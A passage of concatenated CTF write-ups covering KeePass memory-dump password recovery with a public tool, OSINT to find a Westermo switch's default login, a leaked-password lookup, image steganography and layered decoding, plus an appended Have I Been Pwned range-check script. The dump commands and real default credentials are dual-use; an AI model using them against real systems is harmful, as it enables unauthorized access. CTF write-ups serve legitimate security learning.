![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c60af534-41bb-484f-b008-1efbc58f44b4)

We can clone [keepass-password-dumper](https://github.com/vdohney/keepass-password-dumper) locally and run it on the dump file to get the password from it:

```cmd
git clone https://github.com/vdohney/keepass-password-dumper
dotnet run File.dmp
```

As usual with this method, the first 2 characters are not exact but can be deduced:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/04ba0773-bc9b-403f-bb21-f6396613cdc7)

Password: `thesecretpass`

And we can now get the flag from the KeePass file:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/d7c82de5-f93e-48d8-9099-77de5245aea0)

`CTF{c112b162e0567cbc5ae20558511ab3932446a708bc40a97e88e3faac7c242423}`

--------------------------------------------------------------------------------
/Unbreakable-Individual-2024/persisten-reccon.md:
--------------------------------------------------------------------------------
# persistent-reccon

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/98e09b8e-80c3-485f-8d50-f2e972f32820)

# Solution

With this challenge, we only get a generic-looking login page:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/06428772-2255-4b87-9455-70662516456e)

However, this challenge
had an `OSINT` tag associated with it, so we screenshot the login page and do a Google reverse image search:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c8b2c1f5-a6ca-4f1b-b876-a5b609bb870e)

The first result mentions a `Westermo` product; clicking on it, we can see a Lynx series switch:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/7f58ead7-8dab-45d4-a7df-063fd80edf1c)

We can google for the default credentials:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/ac2ca6db-166b-43bb-9694-5de63cd95fa2)

`admin:westermo`

We try those and we get the flag:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/4ed986d8-6cf8-4598-8de0-81d4e421b1d7)

`CTF{7e33e33a06c53d77330b9621a62fd4f1915e6e695f3188aba62c6800695ee30e}`

--------------------------------------------------------------------------------
/Unbreakable-Individual-2024/safe-password.md:
--------------------------------------------------------------------------------
# safe-password

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/ca66ad51-b447-4700-aa7f-693c8909d6bb)

# Solution

This one gives us a `leaked.txt` file containing 150 passwords:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/a361fea1-7872-4599-8ae5-46e86f1be329)

I couldn't think of an easier way, so I manually started looking up passwords from this list in the [Have I Been Pwned](https://haveibeenpwned.com/Passwords) password database. I started with the lower half, which seems to contain easier-to-type passwords:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/b54ace86-c5da-48b1-bed4-d24f9f6090e5)

As per the challenge description, we are looking for a password that has been leaked at least 80 times before.
We find that to be `Bubblegum123!`:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/87164b5a-f2ae-4c17-a497-d1436cd96005)

And we have our flag: `CTF{fdc852bc63a266c8c38db64bef90d62d53ddeef00aa85df7b941ac780b3d75d8}`

--------------------------------------------------------------------------------
/Unbreakable-Individual-2024/secrets-of-winter.md:
--------------------------------------------------------------------------------
# secrets-of-winter

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/cca5799a-4e08-4043-8ec3-b31157c41562)

# Solution

At least on this challenge, we know that the flag is not in the usual format:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/cd8bba95-aa95-498f-9fbe-70dc05588198)

Running `exiftool` on the image, we can find two base64 strings:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/7eac7fe8-736b-4727-a319-4852f8e4043c)

```bash
echo Y2g0bDF9|base64 -d
```

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/a7e5d7cd-907c-4983-9f72-ee4331522858)

```bash
echo ZjFuaSRoLXRoMy0=|base64 -d
```
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/4722a2b6-2463-4c57-aad3-6a2f0acba2d2)

So it looks like we have the last 3 words for now. I also ran [stegoveritas](https://github.com/bannsec/stegoVeritas) on the picture, and it extracted all the different colour layers of the picture into a folder.
I went through them several times looking for hidden characters or words, zooming in and out, until I found the beginning of the flag on a building off in the distance, in a very small font:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/66baea36-9452-4ef3-92e0-f09f4e36783e)

It's very difficult to see, but we eventually build our full flag: `ctf{g3t-3xiftool-to-f1ni$h-th3-ch4l1}`

--------------------------------------------------------------------------------
/Unbreakable-Individual-2024/start-enc.md:
--------------------------------------------------------------------------------
# start-enc

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/b564bba6-7a47-40f1-a5a4-c9e36b390450)

# Solution

This one was very easy; we get a file with easily recognizable `Binary` content:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/86e85972-0de8-4b2f-adcc-8eb9521cb2d8)

We can use CyberChef to automatically recognize each subsequent layer and decode it until we get our flag:

`CTF{584b312bb5bb340e94085c43aba063c5b5a880391393baecf737d87246696cb7}`

--------------------------------------------------------------------------------
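For the safe-password writeup above, an added example (mine, not part of the original writeup) that replaces the manual lookups with the Have I Been Pwned range (k-anonymity) check: only the first five hex characters of the password's SHA-1 leave the machine, and the returned suffix list is matched locally, so a whole `leaked.txt` can be screened without sending any password anywhere. The network call is injected and the range response is constructed, so the counts below are placeholders and not real HIBP figures.

```python
import hashlib
from typing import Callable, Dict, List, Tuple

# prefix -> response body, one "SUFFIX:COUNT" per line (what the real endpoint returns)
RangeLookup = Callable[[str], str]


def sha1_prefix_suffix(password: str) -> Tuple[str, str]:
    # HIBP keys its range API on the upper-case hex SHA-1: 5-char prefix, 35-char suffix.
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def parse_range_response(body: str) -> Dict[str, int]:
    # Lines look like "<35 hex chars>:<count>"; tolerate CRLF and stray whitespace.
    counts: Dict[str, int] = {}
    for line in body.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        suffix, count = line.split(":", 1)
        counts[suffix.strip().upper()] = int(count.strip())
    return counts


def breach_count(password: str, lookup: RangeLookup) -> int:
    prefix, suffix = sha1_prefix_suffix(password)
    return parse_range_response(lookup(prefix)).get(suffix, 0)


def find_leaked(passwords: List[str], lookup: RangeLookup,
                threshold: int = 80) -> List[Tuple[str, int]]:
    # The challenge's condition: every candidate seen at least `threshold` times.
    hits = [(p, breach_count(p, lookup)) for p in passwords]
    return [(p, n) for p, n in hits if n >= threshold]


# Constructed stand-in for the network call, built from the candidates themselves so
# the example runs offline. The counts are placeholders, not HIBP data; a real
# lookup is an HTTPS GET of https://api.pwnedpasswords.com/range/<prefix>.
CONSTRUCTED_COUNTS = {"Bubblegum123!": 123, "correct horse battery staple": 12}


def fake_lookup(prefix: str) -> str:
    lines = []
    for pw, n in CONSTRUCTED_COUNTS.items():
        p, s = sha1_prefix_suffix(pw)
        if p == prefix:
            lines.append(f"{s}:{n}")
    # Constructed filler entry so the body looks like a multi-line range response.
    lines.append("0123456789ABCDEF0123456789ABCDEF012:3")
    return "\r\n".join(lines)


if __name__ == "__main__":
    candidates = ["xK9#unlikely-candidate", "Bubblegum123!", "correct horse battery staple"]
    print(find_leaked(candidates, fake_lookup))
```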